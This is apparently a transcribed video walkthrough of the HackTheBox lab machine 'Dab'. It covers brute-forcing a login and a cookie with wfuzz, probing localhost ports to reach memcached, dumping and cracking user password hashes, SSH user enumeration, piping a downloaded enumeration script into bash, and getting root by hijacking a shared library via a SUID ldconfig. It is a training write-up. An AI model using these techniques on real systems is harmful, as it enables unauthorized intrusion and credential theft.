What's going on YouTube? This is IppSec. I'm doing Dab from HackTheBox, which was a really fun box that involved exploiting the underlying services of common applications. So the first being MemCache, which is a memory caching service for web applications. So if you have a database query that takes a lot of CPU, you cache the result so the next time it runs the query, it goes to your caching mechanism and not the database, making it much less load intensive, I guess. The second piece of the box is getting to root, and that is exploiting the dynamic linker, or how like C applications load libraries. So with that being said, let's just jump in. As always, we start with the nmap with -sc for default scripts, sv enumerate versions, OA output all formats, put in the nmap folder, and let's call this dab, and then the IP address, which is 10.10.10.86. This can take some time to run, so I've already run it. Looking at the results, we have quite a few ports open. The very first thing we notice is FTP is open on port 21, and it's running the application vsftpd 303. So the first thing we can do is a quick search exploit and see if there's known vulnerabilities for that. So doing that, we see all the vulnerabilities are for version 2, not 3, so we can ignore that and move on. It does have a file dab.jpg, and since we can see this, it's anonymous authentication, so this is something we should take a look at. The next thing on the list is SSH, listening on port 22. It is for Ubuntu 2.4, so this is most likely a Ubuntu Xenial box. And then we have a HTTP server listening on both 80 and 88. It's the same exact server version, so chances are this is on the same box. We don't have to worry about like any type of Docker or VM component. So let's just take a look at the FTP first, because once we grab this image, we can rule FTP out pretty quickly. So typing FTP 10.10.10.86, do anonymous for the username and anonymous for the password. We can do directory listing with dir. We see dab.jpg, so I'm going to get that. And then I'm just going to quickly look at like the metadata with exif tool, and we don't see anything unusual here. We can do a strings on it, and don't see anything unusual there. We can bin walk it to see if there's any data other than JPEG in it. We don't see anything. And then finally, we can just look at it in a hex editor real quick. And it looks like a normal image. So I didn't see anything that stood out. I was with the XXD just mainly making sure I didn't notice any strings or odd things like it saying zip or something. So let's just remove that image. Before you remove it, the most critical thing, let's open it up and make sure it's not a picture of anything meaningful. Looks like it's just a picture of probably Fortnite of a guy dabbing. So now we can remove that image and move on. Looking at the nmap, the next thing we should look at is probably the HTTP server on port 80. So let's go to Firefox and go to 10.10.10.86. We get a login prompt here, so let's also go to 10.10.10.86 on port 8080. And we get a message saying access denied, password authentication cookie not set. So I'm going to go back and we'll see if we can try logging in. The first thing I'm going to do is a basic SQL injection, and I'm just typing or 1 equals 1 like this. Whoops. And we'll see if this logs in. Does not. So let's go over to wfuzz and try a few things with this login form. So let's run wfuzz-h to get all the arguments we'll want to do. We'll do wfuzz-c, output with colors, I love colors, -w for a word list, and we're going to try to brute force a password, so I'm going to do user share seclist, and then we're going to go into the passwords folder, and then I'm just going to do dark web 2017 top, let's do 1000 right here. And I'm not doing rocku over the web just because rocku is a enormous list. If we look at the character count or the number of passwords, we have 1000 and top 1000. And then if we look at rocku.txt, we'll see that rocku has, is that 14 million? So this will take quite a while to go through the whole list. So let's start with the top 1000. And then we need, let's see, we got the colors, we got the word list, we need the actual payload. So -d for post data, and we go back to Firefox. We'll try logging in with admin and please subscribe, and then just send this over to burp so we can inspect the URL. And our proxy tab is on. Click login. And we have username, password, and login. So we'll do -d. Username is equal to admin. Password is equal to fuzz in all caps. And then submit equals login. And if you haven't used wfuzz before, it's going to take every item in this word list and replace it where fuzz is. And before I actually run this, I want to try one last thing. Let's click go on this. We just have login failed. If we try a user that doesn't exist, let's see what this user says. Still login failed. And if we try like admin and see what the milliseconds is, it actually went up. So there's no way we can try to enumerate valid users on this easily. So let's just brute force it as we were doing. And the final thing we need is the URL. So this is going to be 10.10.10.86/login. 10.10.10.86/login. And then we can hide everything with 36 words. And HW probably wants to be at the beginning of this. What do we say, 36 words? And we'll see if wfuzz comes back with anything. And it looks like, I guess, passing Unicode gives you a 500 error, which is internal server error. So that's interesting. But we do get a valid password of password1. So let's turn intercept off and let's log in. So admin password1 with a capital P. And let's never save this. And we don't really have anything. We just get a big list of items and a log out button. Pressing Ctrl U to view source, we see debug data tables were loaded from MySQL And if we press Ctrl U again, after refreshing the page, we see data tables were loaded from cache. So that is something interesting. Let's try that again. Ctrl U, MySQL, and if we do this twice, we get cache. So we got some type of caching mechanism here, but no obvious way to exploit the caching mechanism because there's no features of this website. We could try doing a Go Buster and finding other pages on this site, but that's it for now. So let's just look at port 8080, since that was the other thing that came up. The title is internal dev, and it says access denied, password authentication cookie not set. So you could use wfuzz again, but I'm just going to guess the password authentication cookie is going to be called password. So if I edit this header, let's go over into repeat. Click and go, we can see the message. And I'm mainly going to create a new cookie. So add cookie to the header. And I'm going to say the password authentication cookie is password, and we'll try putting the phrase IppSec in there. Click and go. We get the password authentication cookie is incorrect, which is different than not set. So let's go back into wfuzz, do -h, and how do we edit a header? It's probably going to be something like -H right here. So let's go back to a previous wfuzz command, and we're going to remove that -d and replace it with a -H. We'll say password is equal to fuzz, and then instead of 86 /login, it's 86 and then the port, which is 8080. And looking at burp, it's just on /. So wrong header is specified. We want to do -h cookie like that. And there we go. So let's do hide everything with 29 words. And let this go through the list. We do have something come back on secret. So let's go back into burp. Set cookie. Password is equal to secret. Click go. And we get a page. So let's go back into Firefox. We can not go through burp for now. And then go to Tools, Web Developer, Toggle Tools. And we want to create the cookie, so I'm on the Storage tab. The website, click the plus. Now we just created a cookie, so let's give this a name, which was password, and then the value, which is secret. So now we have the cookie set. Refreshing the page gets us this, which we have status of cache engine online, TCP socket test, TCP port, and line to send. So if we do a TC port of like 22 and put anything in the send, launching this, we get the header of SSH. If we did a invalid port, let's try like elite, and then put something in here, we get a internal server error. So if we tried like 80 with the same stuff, we get a bad request because that's not a valid HTTP request. So if we do 80 and then get slash, I think 1.1, get space slash space HTTP slash 1.1. So if we make this a valid header, we get suspected hacking attempt detected. So we have to find out what the bad character list is in this website. And again, we're going to go back to wfuzz. So going back into a terminal, let's look at the last command. And instead of HTTP, let's just redo this whole command. So wfuzz-c, because we want colors, -w for word list. We want this same, do we want this one? No, we do not. So we want to look at new word list. So ls user share sec list. And then there's a fuzzing one. And this alpha case extra looks like it'll be a pretty good one test. So if we look at this, we can see this is just a text file with every character and some symbols. So let's use this one with wfuzz. So wfuzz colors word list. And then we need, let's see. Let's go back to Firefox, and I'm going to test if we need to add that cookie. So let's send this request, go to burp, send into repeater. That's not the right request. Drop that, send this one in repeater. Okay, let's remove this cookie. And we're still good. So as long as we knew this whole syntax, we didn't need to do that whole cookie thing. So only thing this means is we have one less thing to add into wfuzz. So all we need to do, HTTP 10.10.10.86.80.80. The page was socket, and then we need port and CMD. So port is equal to, it doesn't matter what it was. We were sending port 80. And CMD is equal to fuzz. And we have to put that in single quotes because Bash will try something with that and, since that's, I guess, Bash syntax as well. And let's hide everything that is not, let's say, 84 words. So --HW 84. And we get a listing of pretty much all the symbols that get detected as hacking attempt detected. So we just know we have to avoid the use of symbols, and it looks like spaces are fine here. Nothing is not fine, but a space is fine. So the next thing to do is let's brute force all these ports. Let's see if there's anything the server is listening on that we couldn't access from our box, but the server can access through localhost. So this is kind of like a server-side request forgery type of attack because we're tricking the web page into making a connection to 127.0.0.1 and seeing if a port is listening on localhost only. So back to wfuzz. We can do the command, please subscribe. It could be anything, it doesn't matter. Port, this one's going to be fuzz. And then instead of -w, we're going to do something different. So let's do wfuzz-h. And we have, let's see, -z payload. And it says if we do help where the payload is, it would tell us all the different types of payloads. So if we do wfuzz-z help, we can see we can use like IP ranges, buffer overflows, standard in, going up all through these different types of things we can fuzz, another IP, file, we got range. So we can do -z space range, comma, and then numbers in the form of like 0 to 10. So let's try that. So we'll do -z range, and then 1 to 65,535, every single TCP port. I'm going to get rid of the hide words 84 because I don't know what length we want to hide. Let's see. We probably don't want to just see HC 500, which is the error code. So we can see port 21 is open, port 22 is open, port 80 is open, and I'm going to just speed up this video and we'll see what other ports are open on this box. So we have one port come back so far, and that is 11211. So let's go and see what that says when we try connecting to it. So 11211, and we'll just send it, I guess, help. Help is normally a safe bet because it may just respond with how to use the service. And we get the output with just error, which is different than if the port didn't exist. So if we did like 11222 and did help, we get that 500 error. So we know we're onto something with 11211. So let's Google what is port 11211 used for. And let's see. We get a bunch of stuff saying MemCache. So if we look up like a memcached cheat sheet to pull like a valid memcache command, let's see what this says. Get key, let's see, stats should work. So let's do 11211 and send it stats. And we get a bunch of information. So at this point, you should probably look into like exactly how MemCache works. And essentially, when we do things like logging in and pulling information from this database, it's making a MySQL query, which could be heavy. And what MemCache does is it just caches the results of the query, allowing it so when it has to do it within like the next 5 seconds or something, or 5 minutes, it's completely user configurable. It doesn't do the query again. It just pulls that information from memory since it just ran it, and it reduces loads on web servers quite a bit. So let's do 11211. Let's just send this to burp so it's a bit easier to play with. So send this, and we sent stats. So going into burp, let's go to the proxy, forward this one into repeater, and I want to do stats, and then let's do slabs. Slabs is kind of what information is stored in MemCache. So we got stat 16 and stat 26. These are, I guess you can think of them kind of as arrays or items. So we can see the chunk size for this is only 30,000, while the chunk size for 26 is 27,000. So this is much more memory that is cached. But let's just see exactly what stat 16 is. So we can do stats instead of slabs. We can do stats, and I think it's cache dump, cache dump, and then 16. And this is going to bad command line. 11211. Oh, it's stats cache dump. Do we have to do +0? There we go. So this other number, it can be a lot of things. That's just like the maximum number of results to return, and 0 means unlimited. So that item is stock. So if we just do cmd is equal to get stock, we get no output. However, if this information inside of stock was pulled from MemCache, then we would get information. So I'm just going to go here, refresh this page so it goes, whoops, let's turn burp off. Refresh this page. So the memory now is inside of MemCache. And I'm going to go back to burp quickly, run this again, and we get the information out of MemCache. So let's do that again, except for 26. So we do stats slab, slabs, and then we want 26. So stats cache dump 26 0 to make it unlimited. That item is called users. So if we do get users, we have no information. So let's refresh this again quickly, click go. We still don't have anything. And that's because we didn't have to do a user query. So let's log out of this. Let's log in with admin and password 1. And then quickly just go back here and run this. And here we go. It dumps all the usernames. So let's copy this. Go over to the decoder tab and decode this HTML thing by clicking Smart Decode. Copy this, go back into a terminal, and I'm going to kill this wfuzz because I don't think it's going to find anything more. We found what we wanted. And we're going to do users.json and then paste this in. Let's save this file, and then let's use the program JQ. And we're not going to do any filters, so just a period, and then the file name, which was users.json. And then we have it printing all the users in a nice, pretty format. I'm going to pipe this over into awk, and we're just going to do the field separator of a quotation mark. And I just want to pull all the usernames out of this. So let's do that. And then print, we want the second field because this is the first, this is the second, and this would be the third, this would be the fourth, and that would be the fifth. Because we're using a double quote as a delimiter. So we have all the users. And if we wanted to, we could have also done all the passwords. So what I say, for the passwords. So we could do that. And then just send this all into hashcat and try cracking it. And if we do a echo-n, and then pipe that to wc-c to count the number of characters, we see it's 32 characters, so we're assuming this is probably an MD5 hash. However, out of all these users, how do we know which one we want to crack? Should we just try them all, then go into Hydra, or not? Well, there's a... I forget what the CVE is. Let's see if we can find it real quick. There's a way in old versions of SSH to enumerate valid usernames. So let's do msfdb run to open up Metasploit. And while that's doing, let's see, SSH enumerate users 2018. I did this on a box. I forget what it was. The username was like Icarus on that box. But let's see. I think this is the actual CVE it's using. But I like using the Metasploit, so let's just do search SSH enum. Use this scanner. And then, oh, whoops. LS actually showed me the users I wanted. So let's do show options. Set our host to 10.10.10.86. Let's set threads to 50. And then set user file to users.lst. And then run this. And we'll see if we get a hit. Let's Control C this real quick to show, before we do that, we got 497 users. So let's do view v test, and we'll try admin root IppSec. And please subscribe and see if it can find that root is a valid user, because it's going to take a while to go through 500 various users. So let's do this as a test first. Admin root found, IppSec not found, please subscribe not found. So we know this works. Let's see, is there a way to only show valid users? Let's do show advanced options. Retry, debug, no. Maybe set show progress to false. And set verbose to false, even though it's already false. And then just try this user file again. Doesn't look like there's a way to easily hide this without modifying the module, so we'll just wait. And there we go. We finally have a hit. Genevieve is a valid user apparently. So let's go and crack his hash while this keeps on going. So let's grep Genevieve against users.json. Let's do jq.users.json grep for the username. Go get his hash. Did I copy it? I did. So let's go into the Kraken and just don't use your VM for this. Well, MD5 hashes are fine, but doing any cracking in a VM is just super slow. So that's why I always SSH to a different box. So let's go into hashes and we'll call this dab.gene, I guess. Put this here, /hashcat -h. Can we grep -i MD5? Okay. I think it's 0 for just straight MD5. That's what it looks like. So we'll do hashcat -m0 for MD5, and then we want hashes dab.gene, and we'll do the word list of opt word list rocku.txt. And because it's not a website, we can crack much quicker than we can brute force, so that's why I used Rocku, which had that 14 million versus just top 1,000. So cracking's a lot faster than brute forcing, so you can use bigger word lists. So princess1 is the password, so let's try that. SSH at 10.10.10.86. Put the password in, and there we go. We now are local user on the box. We could do wc-c user.txt, and we see 33 characters, so that's probably the MD5 sum and then a line break. So I guess the next step is to check if I can sudo to execute anything. So sudo -l princess1, and it shows us executing user bin try harder. So if I do sudo try harder, it instantly says root at dab. And then whenever we try to run a command, it does a segfault. And then says that would have been too easy, try something else. So try something else, and we get the same thing. So let's look at this code to see exactly what is happening under the hood. So scp Genevieve at 10.10.10.86 user bin try harder, and then copy it to my current directory, princess1. And then let's analyze this in Radar. So R2, try harder, AAA to analyze all functions and everything. We can do AFL to print list, and A stands for analyze, F is function, and L is list. So radar does everything, and the very first letter does things. So AFL, we don't really see any functions. We see main. So let's do print disassembly function main. And we can look through this code, and we see it loading a string root dab, into EDI, and then printing. And then we have it doing fget, so asking for input, and then after that, moving string segfault and printing that. And then we got int s, which is 3, and then it's calling sleep for whatever 3 is, and then printing this string. So if you don't like this function view, you can do PD question mark, and you'd see C, which would be a pseudo disassembler and C-like syntax. So if we did PDC at main, you may get it in something that's a little more familiar. But with it literally just saying root at dab, and then upon entering anything, immediately just printing segfault, then waiting 3 seconds, then printing something else, I'm going to say this binary is a rabbit hole because there's literally no functionality to exploit in it. So let's get out of radar. Let's go back up here. Look here, we don't have a bash history. So let's just try LinEnum. So opt LinEnum, and then Python -m simple HTTP server. And then we'll do curl 10.10.14. Let's see what my IP is. It is 3, port 8000, and then linenum.sh. Pipe this over to bash, and we can see the thorough test were enabled right there. That's just one of the I think the only modification I've done to linenum. So if we go into that directory and just type git diff, we can see I've just added thorough equals 1, so my script, the thorough checks are ran, as all that does. So I'm going to let this finish, and then we can go dig through the output. LinEnum has finished, so let's go up and search. So let's see. Can I do slash? Will this search? Let's do... Huh. I'm just trying to search down for... That's not it. I guess because this is some weird Unicode color when I'm just typing... Oh no, there's no space. I just can't read. Don't mind me. Let's go up to the top. LinEnum. Okay. I was putting a space. There's no space. There we go. So now I can just hit N to go through different things. So I don't care about kernel information. We know it's compiled in 2018, so chances are there's no kernel privesc for it. Hostname's dab, user information, Genevieve, none in any groups. User that previously logged into the system. We have root from 10.10.14.4 and me from 10.10.14.3. But root's is back in August and mine is in January, so about 4-month difference between there, so no one else is on this box, it looks like. Looking at who else is logged in, we can confirm that. Only my thing is logged in. Group memberships, don't really care about that. Looks like we have some admin users, don't care. Past WD contents. Let's see. The LXD group is interesting to me, but because I'm not a part of it, I'm just going to ignore it. We got super user, directory permissions on /home. We only have one user in /home, so I can ignore that. Files owned by our user. I'm going to ignore that for now. Hidden files, ignore that. Word readable files in home. Nothing looks interesting. Home directory contents, we've looked at that. root can log in through SSH. The path doesn't look interesting. I wonder if /snap/bin is new. That may be a Ubuntu thing. Available shells, sh dash bash or bash. Nothing interesting. Umask, not interesting. Crons, that one's normal. Let's see, I think that is a normal cron listing. I'm mainly looking for crons like that were modified recently. So we know this box was released in 2018. If a cron is from 2016, even though I don't recognize what FS trim is, I'm guessing the creator did not put it there because number one, it's in cron.weekly, so that would just be horrible if we had to exploit that. And number two, it's 2 years old. So cron tab contents, nothing interesting. System D timers, doesn't look like anything interesting there. IP information and ERP, we see nothing really in the ERP history, so we know there's no like Docker or VMs running on this box. Name server, default route, listening sockets, UDP, running processes. I'd probably look at running processes more in depth if I don't see anything. Sudo version, MySQL version, dub. We got dev, HTML, and prod. We got some config files like dev.ini, so maybe go pillage these configs for credentials. Useful file locations, compilers. Can't read sensitive files. Set UID files. This is always interesting. We have... Oh, whoa. I didn't want that. SUID. There we go. So, glancing down the list, mainly putting extra emphasis on anything that's 2018. Umount's not interesting. Mount's not interesting. myexec, this one looks interesting. This isn't a normal binary. And ldconfig I'm not used to seeing in this list, and I don't know what ldconfig.real is, so we got 2 ldconfigs here. One small, one big. So definitely check out ldconfig and myexec. Let's see. GUID files. Going down. SSH agent maybe. myexec is interesting. Snap. I'm guessing this is a Ubuntu thing. ldconfig. So again, ldconfig really stands out along with myexec. So let's just go and poke at those. Let's see what myexec is. Enter password, enter something, and we see invalid password. So let's analyze this file. So just like we did before, let's download the file. So scp genvieve at 10.10.10.86 user bin myexec. And then the password, princess1. Radar on this file, AAA. And then AFL to list functions. We really only got main, so PDF at main. And let's see what goes on. So we got moving a string just before it does enter password, and the string is secure login. So chances are this is the password right off the bat. And then let's see. If the password is correct, call seclogin. And that is not in this binary. We don't see any secure login in our function list. So this is going to be a, I guess, shared library or something. So let's ignore that and just see what happens when we type secure login in the file. So myexec, secure login, I think it was that. Maybe it's G1N. There we go. And we see the function seclogin was called, and there's a to-do placeholder for now. Function's not implemented yet. So we don't see it actually in this binary. if we do list all the libraries that this is linked to, user bin myexec, there is libseclogin.so, so we can see what that function actually does. So we can do scp genevieve at 10.10.10.86, paste that in, prints s1 or to the file, and then let's see, pdf at sim.seclogin, and we see this file is literally just like try harder. It calls this function and then just prints this string to the screen and then exits. But unlike let's do sudo -l, unlike user bin try harder, we got this shared library. And if we looked at the set UIDs, set UID files, ld.config, which handles all this dynamic linking, is set UID bit. So if we do cd etc ld.so.conf.d, we can see there is a test.conf, which is going to say that we can drop files into /temp, and then if we run ld.config again, it will repopulate the caching of libraries on the system and then link us potentially. So the main thing we're trying to do is if we go ldd user bin myexec, we are trying to get libseclogin to not equal this library. And because we have control over ld.config, we should be able to do that. So let's first create a replacement file. So we'll call this libseclogin.so, and then just create a basic shell. So standard header. Then we need to say this function can be called. And normally this would happen like in a .h file, but just putting in one to make it easy. And then let's create that seclogin function. So set reuid 00. This is going to set the effective ID to root. And then we want to execute bin bash. And that's it. So if we compile this with gcc-shared for shared library, -o libsec. This shouldn't have been .so, this should be .c. So gcc shared libseclogin.so as the out file and libseclogin.c as the source. What did I screw up? Called object is not a function pointer. V libseclogin.c. I think that's right. Oh, I'm missing a comma. There we go. Let's see. RO data cannot be used when making a shared object. Recompile with fpic. So let's do that. Now we got libseclogin.so. So if we copy this and put it into temp, let's do ldd on user bin myexec. We see that's what it looks like if we do ld.config. Do it again. And now we have overwritten the pointer for libseclogin, and it's in temp now. So if we execute the binary myexec, and then s3cu r3l0g1n, was that the password? Password is correct, and we get a shell. So if we do id, we are root, and there's root.txt. So if we didn't know the password, it didn't feel like getting the password, we could have always just hijacked a different function. So instead of seclogin, we can do printf. Whoops. Seclogin, printf. And then let's remove libseclogin.so. And when you start doing things like this, you have no idea what can happen on your system. But libseclogin's only used in this program, so I don't suspect anything will go bad. Let's move that file out of there. It's probably owned by root, because I don't think I should be able to write in that directory. Oh, this just got interesting. Oh no, I can. I don't think I'm supposed to be able to write in there. I wonder if there's a check on only root owns it. Root, yeah, that's word writable. Okay, we'll go back to that. Let's recompile this. And if we looked at libseclogin.c, we could see that instead of libseclogin, it's hijacking printf. So let's do ld.config. We haven't copied it yet, so this is just basic functionality of the program. So if we copy libseclogin.so in attempt, run ld.config again, and then let us run myexec, and we immediately get a shell because we hijacked that printf function. But let's do something real quick. Etsy, what was it? ld.so.conf.d, remove test.conf, and then exit, ld.config, myexec. Okay, even though that file is there, because we don't have test.conf in that directory, it's not going to link. So let's go into Etsy ld.so.conf.d, v test.conf, add temp, and let's see if this works. User bin myexec. Huh. So I guess that directory definitely should not be writable by anyone. So, learned something new there, but hope you guys enjoy the video. Take care, and I will see you all next week.